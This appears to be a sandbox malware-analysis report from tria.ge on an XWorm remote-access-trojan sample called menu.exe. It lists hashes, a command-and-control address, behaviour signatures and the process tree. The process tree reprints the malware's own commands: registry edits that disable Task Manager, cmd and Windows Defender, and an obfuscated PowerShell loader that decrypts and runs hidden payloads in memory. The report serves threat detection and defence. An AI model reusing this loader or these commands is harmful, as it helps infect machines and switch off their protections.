Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

menu.exe

windows7-x64

8

menu.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    177s
  • max time network
    193s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/11/2024, 02:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    menu.exe

  • Size

    309KB

  • MD5

    b7a65ac9cc1f6ac490080b604dca0209

  • SHA1

    40faa498a2e24a65b8ba74fd8123e63e2432f71f

  • SHA256

    061282d0c5d8967e46c0b0739488fbefd996615a9059844274b1cb4df83b52bb

  • SHA512

    fea5efae6766efd76d1b504ea516dd14eef955e84fec12a9035752366b7d36e078064b2088e04bee30ce267baa899a1b87f5a023316e59d4ecba7387a61943ed

  • SSDEEP

    6144:QGXEB3uR4D7P05EkRTwEur5447h/PcHnUSFIT7JHoI0E7YPWs3kZy:QapW/PqbTw3FcHUSFU1v0E7v

Score
10/10
xwormevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

85.209.133.220:111

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    system.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 3 IoCs
  • Blocks application from running via registry modification 3 IoCs

    Adds application to list of disallowed applications.

    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Disables cmd.exe use via registry modification 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\menu.exe
    "C:\Users\Admin\AppData\Local\Temp\menu.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\load.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4972
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:1356
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
          3⤵
            PID:4312
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
            3⤵
            • Disables cmd.exe use via registry modification
            PID:4020
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
            3⤵
              PID:2344
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f
              3⤵
                PID:2940
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f
                3⤵
                  PID:1448
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                  3⤵
                    PID:3828
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
                    3⤵
                    • Blocks application from running via registry modification
                    PID:1912
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f
                    3⤵
                    • Blocks application from running via registry modification
                    PID:3612
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1004
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    3⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:912
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"
                  2⤵
                    PID:4816

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yodfub5p.yni.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\load.bat
                  Filesize

                  1KB

                  MD5

                  cf08811b97cdd3d57685a7841a40e2d4

                  SHA1

                  faefa9b229e81eef5d200799c39b5db5511922d2

                  SHA256

                  7f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c

                  SHA512

                  695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\loader.bat
                  Filesize

                  291KB

                  MD5

                  d05f7937bc9eef5bf3042a8a2ecd2f08

                  SHA1

                  15230c5d5506e80ac6cecd06a21bea1a44aeef08

                  SHA256

                  b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226

                  SHA512

                  42954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\ran.vbs
                  Filesize

                  4KB

                  MD5

                  be03bd7bd0315142da6482ee8075f97d

                  SHA1

                  44242df82433922b5dae792842d18da1eccac112

                  SHA256

                  f245b406955a4a335f5eb76ef8e48958c55be9e7e667545e95602440c64ee9ae

                  SHA512

                  55230398878d8cbca4b14a93b9e5cae00790f845140f28c9c82c622e7bc53eb4c9875de281eb3ba280478cbecbe56eb6a1720832e9afc6607daeafb83f83e7e9

                  Download Submit

                • memory/912-15-0x00000267F5FA0000-0x00000267F5FC2000-memory.dmp

                  Filesize

                  136KB

                  Download

                • memory/912-25-0x00000267F8370000-0x00000267F8378000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/912-26-0x00000267F8390000-0x00000267F83C8000-memory.dmp

                  Filesize

                  224KB

                  Download

                • memory/912-27-0x00000267F83F0000-0x00000267F8406000-memory.dmp

                  Filesize

                  88KB

                  Download

                • memory/912-32-0x00000267F8800000-0x00000267F880C000-memory.dmp

                  Filesize

                  48KB

                  Download

                • memory/3992-0-0x00007FFA73F03000-0x00007FFA73F05000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/3992-1-0x0000000000530000-0x0000000000584000-memory.dmp

                  Filesize

                  336KB

                  Download